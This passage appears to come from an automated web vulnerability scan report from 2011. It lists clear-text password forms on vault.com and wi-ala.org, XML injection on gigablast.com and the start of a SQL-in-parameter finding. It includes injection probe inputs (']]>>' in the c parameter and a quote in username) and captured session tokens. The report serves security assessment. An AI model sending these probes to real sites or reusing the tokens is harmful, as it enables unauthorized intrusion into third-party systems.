<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9Ybl9MdzU2NDMwMDAxLzE3MzY5MDcvbGk!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...
8.8. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000SJ1mmU6BOCbzCEKkGgUIi9q:140i3s34m; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:25 GMT;path=/
Content-Length: 60330


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</script>


<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9Fbl9MdzU2NDMwMDAyLzE3MzY5MDgvbGk!/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
<div id="minCharMembership">
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...
8.9. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:30 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000EomNXSy4TXZVIAszHpfxWyJ:140i3s34m; Path=/
Keep-Alive: timeout=10, max=56
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:15 GMT;path=/
Content-Length: 59570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9zN0dxbDQwMDkwMDAxLzE3MzY4NDUvbGk!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...
8.10. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:30 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000EomNXSy4TXZVIAszHpfxWyJ:140i3s34m; Path=/
Keep-Alive: timeout=10, max=56
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:15 GMT;path=/
Content-Length: 59570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</script>


<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS94N0dxbDQwMDkwMDAyLzE3MzY4NDYvbGk!/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
<div id="minCharMembership">
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...
8.11. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:29 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000GNJvwOeybIylqfuGPV4Evvo:140i3s34m; Path=/
Keep-Alive: timeout=10, max=19
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:14 GMT;path=/
Content-Length: 60146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</script>


<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9Wc3g5OjQ5NzcwMDAyLzE3MzY4MzcvbGk!/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Perkins-Coie-LLP"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
<div id="minCharMembership">
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...
8.12. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:29 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000GNJvwOeybIylqfuGPV4Evvo:140i3s34m; Path=/
Keep-Alive: timeout=10, max=19
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:14 GMT;path=/
Content-Length: 60146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9Gc3g5OjQ5NzcwMDAxLzE3MzY4MzYvbGk!/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...
8.13. http://www.wi-ala.org/ClubPortal/wala/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ClubPortal/wala/ HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:09:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522775;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Set-Cookie: CFTOKEN=160c8b3f842edead-E5661479-9CF0-1BCF-8A4BC5F474D9CD94;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522775%26CFTOKEN%23%3D160c8b3f842edead%2DE5661479%2D9CF0%2D1BCF%2D8A4BC5F474D9CD94%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A23%27%7D%23hitcount%3D2%23cftoken%3D160c8b3f842edead%2DE5661479%2D9CF0%2D1BCF%2D8A4BC5F474D9CD94%23cfid%3D26522775%23;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

   <title>
   Wisconsin Association of
...[SNIP]...
<div style="margin-left:10px; margin-top:10px;">
   <form name="CFForm_1" id="CFForm_1" action="/clubportal/memLoginExe.cfm?clubID=177" method="post" enctype="multipart/form-data" class="1288form" onsubmit="return _CF_checkCFForm_1(this)">
   <input type="hidden" name="cftokenvalue" value="160c8b3f842edead-E5661479-9CF0-1BCF-8A4BC5F474D9CD94" />
...[SNIP]...
<br>
   <input name="password" id="password" type="password" class="1288formtext" size="9" /><br>
...[SNIP]...
8.14. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=3837 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<div style="margin-left:10px; margin-top:10px;">
   <form name="CFForm_1" id="CFForm_1" action="/clubportal/memLoginExe.cfm?clubID=177" method="post" enctype="multipart/form-data" class="1288form" onsubmit="return _CF_checkCFForm_1(this)">
   <input type="hidden" name="cftokenvalue" value="a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD" />
...[SNIP]...
<br>
   <input name="password" id="password" type="password" class="1288formtext" size="9" /><br>
...[SNIP]...
8.15. http://www.wi-ala.org/clubportal/memLogin.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/memLogin.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination%2E&username=%27 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D11%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.7.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D12%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:04 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<table width="175" border="0" cellspacing="0" cellpadding="2" bgcolor="E8E8E8">
<form name="login" id="login" action="http://www.wi-ala.org/clubportal/memLoginExe.cfm?clubID=177" method="post" enctype="multipart/form-data" onsubmit="return _CF_checklogin(this)">
   <input type="hidden" name="cftokenvalue" value="a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD" />
...[SNIP]...
<td width="100"><input name="password" id="password" type="password" size="12" /></td>
...[SNIP]...
8.16. http://www.wi-ala.org/clubportal/wala/Page.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/wala/Page.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /clubportal/wala/Page.cfm?clubID=177&pubmenuoptID=1361 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D8%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.6.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D9%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:53 GMT;path=/
Content-Type: text/html; charset=UTF-8


               <html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>
Membership -
...[SNIP]...
<div style="margin-left:10px; margin-top:10px;">
   <form name="CFForm_1" id="CFForm_1" action="/clubportal/memLoginExe.cfm?clubID=177" method="post" enctype="multipart/form-data" class="1288form" onsubmit="return _CF_checkCFForm_1(this)">
   <input type="hidden" name="cftokenvalue" value="a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD" />
...[SNIP]...
<br>
   <input name="password" id="password" type="password" class="1288formtext" size="9" /><br>
...[SNIP]...
9. XML injection  previous  next
There are 2 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

9.1. http://gigablast.com/ [c parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://gigablast.com
Path:   /

Issue detail

The c parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the c parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /?c=dmoz3]]>> HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2481
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:43 GMT
Date: Thu, 12 May 2011 15:16:18 GMT
Last-Modified: Thu, 12 May 2011 15:16:18 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gigablast</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" cont
...[SNIP]...
<a href="/searchfeed.html">XML Search Feed (new)</a>
...[SNIP]...
9.2. http://www.gigablast.com/ [c parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.gigablast.com
Path:   /

Issue detail

The c parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the c parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /?c=dmoz3]]>> HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2481
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:34 GMT
Date: Thu, 12 May 2011 15:16:09 GMT
Last-Modified: Thu, 12 May 2011 15:16:09 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gigablast</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" cont
...[SNIP]...
<a href="/searchfeed.html">XML Search Feed (new)</a>
...[SNIP]...
10. SQL statement in request parameter  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.mccarter.com
Path:   /new/showlocationnew.aspx

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

